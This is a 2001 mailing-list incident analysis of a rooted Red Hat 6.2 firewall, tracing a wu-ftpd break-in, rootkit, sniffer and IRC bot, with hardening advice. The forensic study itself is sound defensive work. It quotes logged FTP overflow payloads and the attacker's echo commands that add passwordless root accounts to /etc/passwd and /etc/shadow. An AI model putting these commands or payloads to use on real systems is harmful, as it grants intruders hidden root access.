Security Incidents mailing list archives
RedHat 6.2 box exploited - analysis of attacker activity
From: Curt Wilson <netw3 () NETW3 COM>
Date: Sun, 4 Feb 2001 06:56:45 -0000
Curt Wilson, Netw3 Consulting 02/02/2001 This is my first analysis of a Linux box that has been rooted. This is intended to be somewhat of a teaching document, and does not assume a large degree of technical skill. If anyone sees any errors in here or has any comments, I'd be happy to hear from you at netw3 () netw3 com The box in question is an unpatched Red Hat Linux 6.2 machine running as an ipchains firewall and IP masquerade server. The attacker(s) main goal in system compromise seems to be for the purpose of setting up a BNC server that will allow connections to IRC networks and an IRC bot. Attacker also used the compromised linux system to search for other vulnerable systems running the Washington University FTP through the use of two exploits (wu-scan and muje) as well as the attempted or actual exploits of numerous remote systems through the statdx exploit. The statd exploit attacks the remote procedure call application rpc.statd and opens up an interactive root shell on TCP port 39168. (For more info on statdx, see paper by George Bakos at http://www.sans.org/y2k/practical/George_Bakos.html .) Intruder erased log directory /var/log which damaged numerous symlinks. A more careful attacker would have left this directory intact but edited the specific log files to erase their tracks. It is clear from system analysis that this person is whats known as a script kiddie and does not represent an advanced attacker. Intruder appears to have penetrated the system using an exploit that attacks WU-FTP. The default wu-ftp on Red Hat 6.2 (wu-2.6.0(1) in this case) is vulnerable and exploit code has been published on the Internet and has been in wide use amongst the cracker underground. Patches are available on the redhat website. Buffer overflow attacks on wu-ftp take place through a specially crafted password sequence that includes the spawning of /bin/sh. The IP addresses are most likely other compromised systems that the attackers are using to break into other sites and could be one of the sites that was used to crack this box. Logs of attacks in progress: 211.72.123.250 => external_ip_of_linux_system [21] LeLmNnNnUSER ftp NBnPASS 111F11CA? k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11 151.15.186.199 => external_ip_of_linux_system [21] Xv+R6-6- user ftp]-1pass 111F11CA? k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11a- 3-a-aSITE EXEC %x %x %x %x +%x |%x 156.111.178.186 => external_ip_of_linux_system [21] EEUSER ftp QPASS 111F11CA? k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11 syr-24-95-165-70.twcny.rr.com => external_ip_of_linux_system [21] q-q-q-q-USER ftp q-%PASS 111F11CA? k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11 211.250.5.4 => external_ip_of_linux_system [21] FFUSER ftp pPASS 111F11CA? k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11 63.105.115.4 => external_ip_of_linux_system [21] L'L'0$L)^1L)^1USER ftp L)k1PASS 111F11CA? k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11 The wu-ftp exploit probably allowed the attacker to bind /bin/sh with a TCP port. The attacker then telnets to the port and has interactive root access. Another method is that the exploit allows the execution of arbitrary code such as appending a username into the /etc/passwd and /etc/shadow files that is then used through the telnet port. Without detailed logs, its hard to know exactly what the attacker did since they cleaned up some other commonly exploited services when they first logged in to the system. Its possible that the attacker gained some other means of initial access but evidence suggests that these FTP exploits were the means. A Red Hat announcement about this problem can be found at http://www.redhat.com/support/errata/RHSA- 2000-039.html At some point, this attacker (or other attackers) placed a file in /bin/psr which adds a user named rewt with root level access and a user named mujixi to the /etc/passwd and /etc/shadow files: echo "rewt:x:0:0:root user,,,:/root:/bin/bash"
/etc/passwd
echo "mujixi:x:666:666:ala care da
muje,,,:/tmp:/bin/bash" >>/etc/passwd
echo "rewt::::::::" >>/etc/shadow
echo "mujixi::::::::" >>/etc/shadow
After obtaining root access, attacker modified multiple
system files and scripts to cover their tracks:
/etc/rc.d/rc.sysinit has been modified to run the
following:
/usr/sbin/sshd2
/usr/sbin/gpm.root
/usr/sbin/gpm.root
/usr/sbin/gpm.root appears to be controlled by a
config file /etc/gpm-root.conf and contains the
following commands:
cd /usr/X11R6/include/X11/
This directory is invisible to the standard ls
command, but will show up with an ls a to display
all files. This is a common attacker trick. Most of
attackers tools were placed in this directory.
./linsniffer > tcp.log &
linsniffer captures login and passwords in an
Ethernet environment. A switched network makes
this attack more
difficult
/usr/sbin/sshd2 p 1983
Attacker runs an SSH server on port 1983.
After exploiting the system for root access, the
attacker appeared to add a username muje1 to
the /etc/passwd and/or /etc/shadow files with a group
ID of 501. Attacker also edited the /etc/ftpusers file,
perhaps allowing more users to login through FTP
than the original setting. Other suspicious user ids
include muje and group IDs include 1018 and 1004.
Next, attacker kills all instances of the lpd process.
This is probably so others wont exploit his system
through an lpd buffer overflow (never mind that lpd
was not an open port from the outside, attacker
wanted to secure his own access). Attacker also
removed the portmapper startup file
in /etc/rc.d/init.d/portmap which stopped the
portmapper from listening on TCP port 111 (never
mind that portmapper was not an open port from the
outside). Attacker then cleans up by
running updatedb and removing a package named
srk.tar.gz (which might be a rootkit), and removing
the home directories of users muje and muje1.
The user appears to have replaced various system
binaries such as netstat, ps, ifconfig, and top to cover
their tracks. The replaced version of ps does not
show activity such as the linsniffer, and the replaced
version of ifconfig does now show the interface
running in promiscuous mode. The other replaced
binaries are most likely tailored to hide the attackers
activities from administrators eyes. These
replacements may have been done with srk.tar.gz. I
was unable to find a published tool named srk but
the rk suggests a rootkit. Please see
http://packetstorm.securify.com/UNIX/penetration/root
kits/ for a large selection of rootkits.
The group ID 1018 appears to have ran the rootkit.
The system binaries that were replaced by this
activity are as follows:
-rwxr-xr-x 1 1018 users 19840 Nov 25
1998 /sbin/ifconfig
-rwxr-xr-x 1 1018 users 33280 Dec 27
1998 /bin/ps
-rwxr-xr-x 1 1018 users 35300 Jan 2
1999 /bin/netstat
-rwxr-xr-x 1 1018 users 53588 Jan 12
1999 /usr/bin/top
-rwxr-xr-x 1 1018 users 13621 Dec 19
10:14 /bin/vobiscu (unfamiliar)
The group ID 1004 created the following files of
interest:
[root@fortran /dev]# ls -al /dev/caca
-rw-rw-r-- 1 root 501 117 Jan 13
21:01 /dev/caca
[root@fortran /dev]# strings /dev/caca
1 193.226.125
1 193.230.192
1 194.102.218
1 193.231.249
3 31221
3 31337
3 89898
3 44113
3 31223
3 22546
3 666
4 6666
31337 is commonly used in the computer
underground. Many Trojan horse applications listen
on port 31337. It is a variation of the word elite. 666
is used by attackers, and port 6666 may refer to an
IRC or BNC server.
-rw-rw-r-- 1 root 501 97 Jan 13
21:01 /dev/dsx
[root@fortran /netw3]# strings /dev/dsx | more
3 psybnc
3 wu-scan
3 muje
3 statdx
3 sl2
3 sshd2
3 linsniffer
3 smurf
3 slice
3 mech
3 muh
3 bnc
/dev/dsx appears to be a listing of what the attacker
has installed.
-rw-rw-r-- 1 root 501 12288 Jan 13
21:01 /etc/psdevtab
[root@fortran .ssh]# ls -al /root/.ssh
total 16
drwxr-xr-x 2 root 501 4096 Jan 24 00:17 .
drwxr-x--- 8 root root 4096 Feb 2 18:54 ..
-rw------- 1 root root 663 Jan 28 20:41
known_hosts
-rw------- 1 root 501 512 Jan 28 20:41
random_seed
-rw-r--r-- 1 1004 users 307 Aug 31
1998 /usr/man/man6/ssh_config
-rw------- 1 root 501 552 Jan 13
21:01 /usr/man/man6/ssh_host_key
-rw-rw-r-- 1 root 501 356 Jan 13
21:01 /usr/man/man6/ssh_host_key.pub
-rw------- 1 root 501 512 Feb 3
04:55 /usr/man/man6/ssh_random_seed
-rw-r--r-- 1 1004 users 697 Dec 27
1998 /usr/man/man6/sshd_config
/usr/man/man6 is also used by attacker(s) to store
SSH key and configuration files.
The following ports are open and listening on the local
(192.168) interface of the system:
21 ftp # point of entry
22 ssh # activated by attacker
23 telnet
25 smtp
79 finger
98 linuxconf
113 auth
513 rlogin
514 rsh
515 lp
1983 ssh # activated by attacker
The primary user that ran the BNC server appears to
go by the name of bulangia or buLaneL
or bulanel and a secondary user goes by the name
of NINA16. There is evidence of multiple
connections to Bulgaria and Italian IRC networks and
remote systems. Some of the hosts that used the
BNC server include 5dial86.xnet.ro and
11dial217.xnet.ro. Various IRC servers were visited
by these users, and if further action was warranted,
investigations could take place by connecting to the
same IRC networks and attempting to track these
people down.
Attacker(s) also installed what appears to be an IRC
bot going by the name of eddy or eddybot. The
software package used to implement this bot was
called emech-2.8 and the config file for e-mech
reveals details such as an ircname of H-a-c-k T-h-e
F-u-c-k-i-n-g P-l-a-n-e-t ! and channels such
as #Linux_mafia. The linkpass and entityname are
present in the config and users file, which could allow
counterintelligence to be performed if desired.
Recommendations:
Apply patches to Red Hat systems running ipchains
firewalls. Red Hat 6.2 has nearly 50 security patches.
See http://www.redhat.com/support/errata/rh62-
errata-security.html.
Several accounts and passwords were obtained
through the user of the linsniffer application. A
switched environment can help reduce the risk of
sniffing attacks.
Lock down systems to provide defense in depth. Do
not simply rely upon ipchains to block hostile traffic.
Deny all traffic except what is specifically allowed.
Comment out services in /etc/services that do not
need to be ran (finger, etc) as well as in /etc/rc.d. If
the FTP service will be used, make sure
that /etc/ftpusers only allows specific usernames. If
attacker pierces firewall mechanism, limit what is
available by turning off everything that is not needed,
leaving only those services that are truly necessary.
Portsentry, which is running on the system, is a nice
addition, but obviously did not help in this instance.
Since the wu-ftp vulnerabilities are widely known,
attacker would only have to find the existence of TCP
port 21 with a banner that identified itself as a
vulnerable version of wu-ftp. The use of TCP
wrappers and ipchains to restrict access to ftpd
would be helpful. Modify listening services banners to
reflect false information to confuse attackers and
automated exploit/scanning applications.
Systems management should never be performed
over an unencrypted connection such as telnet.
Install SSH on the server and on your client systems
and use it. This encrypts connections and makes it
much harder for an attacker to obtain your login
credentials.
An intrusion detection system such as snort
(www.snort.org) is inexpensive, easy to configure,
and in wide use. Snort can monitor a network and
alert a network manager (with the proper
configuration) via pager or email that an attack is
taking place. Tripwire is a file integrity monitor that
can be used to take a snapshot of certain key system
files ( such as ps, netstat, ifconfig, and many more).
When these key system files are changed, an alert
can be generated to notify that something suspicious
is taking place. There are freeware/GPL options for
SSH (openSSH) and a freeware tripwire clone
available on the Internet (see www.whitehats.com for
a large collection of open source security tools).
Curt Wilson - Netw3 Consulting
netw3 () netw3 com
Current thread:
- RedHat 6.2 box exploited - analysis of attacker activity Curt Wilson (Feb 04)
- Re: RedHat 6.2 box exploited - analysis of attacker activity Thomas Roessler (Feb 05)